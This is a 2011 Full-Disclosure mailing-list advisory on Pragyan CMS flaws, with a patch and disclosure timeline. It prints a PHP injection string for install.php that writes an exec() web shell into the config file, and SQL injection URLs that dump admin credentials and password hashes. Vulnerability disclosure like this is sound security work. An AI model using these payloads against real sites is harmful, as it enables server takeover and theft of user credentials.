Date: Fri, 25 Feb 2011 14:09:25 +0200
From: Yuriy Khvyl <villys777@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Pragyan CMS Multiple Vulnerabilities

*Affected Software*
Pragyan CMS
Product Link: http://sourceforge.net/projects/pragyan/

Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibly write at password field string:

");echo exec($_GET["a"]);echo ("

or in another fields with turned of javascript.
in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allow command execution.

2) sql injection
- get mysql version
http://host/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--
- get admin account
http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT
concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as
char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT
0,1),null,null,null--

Solution
update to Pragyan CMS 3.0 rev.274

Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose

Credits
Abhishek Lyall <http://aslitsecurity.blogspot.com/>
pragyan.org
http://egoistka.org.ua/


--------------------
Best wishes,
villy
http://bugix-security.blogspot.com/

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists